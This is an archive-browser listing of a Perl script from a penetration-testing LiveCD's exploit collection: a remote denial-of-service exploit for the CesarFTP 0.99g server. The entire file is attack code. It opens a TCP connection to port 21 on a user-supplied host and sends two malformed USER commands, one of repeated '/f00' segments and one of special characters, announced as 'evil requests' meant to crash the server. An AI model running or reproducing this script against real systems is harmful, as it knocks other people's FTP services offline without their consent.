home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / cesarftp / CesarFTP-ex1.pl < prev   
Perl Script  |  2005-02-12  |  1KB  |  45 lines

  1. #!/usr/local/bin/perl
  2. # DOS remote exploit for CesarFtp 0.99g
  3. #It will try to crash CesarFtp Server remotely:)
  4.  
  5.  
  6. use Socket;
  7.  
  8. $ARGC=@ARGV;
  9. if ($ARGC !=1) {
  10.         print "Usage: $0 <host>\n";
  11.         exit;
  12. }
  13.  
  14.  
  15. $string="x" x $length;
  16.  
  17. my($remote,$port,$iaddr,$paddr,$proto,$line);
  18. $remote=$ARGV[0];
  19. $port = "21";
  20.  
  21. $iaddr = inet_aton($remote) or die "Error: $!";
  22. $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
  23. $proto = getprotobyname('tcp') or die "Error: $!";
  24.  
  25. socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
  26. connect(SOCK, $paddr) or die "Error: $!";
  27. $login1="user /f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
  28.         f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
  29.         f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
  30.         f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/f00/
  31.         f00/\n";
  32.  
  33. #---------------------------------------------------
  34. print "Sending evil request 1...\n";
  35. print ($login1);
  36. send(SOCK,$login1, 0) or die "Cannot send query: $!";
  37. $login1="user !@#$%^&*()_\n";
  38. print "Sending evil request 2...\n";
  39. print ($login1);
  40. send(SOCK,$login1, 0) or die "Cannot send query: $!";
  41. print "Now if you are lucky the server will crash:)\n"
  42.  
  43. #End
  44.  
  45.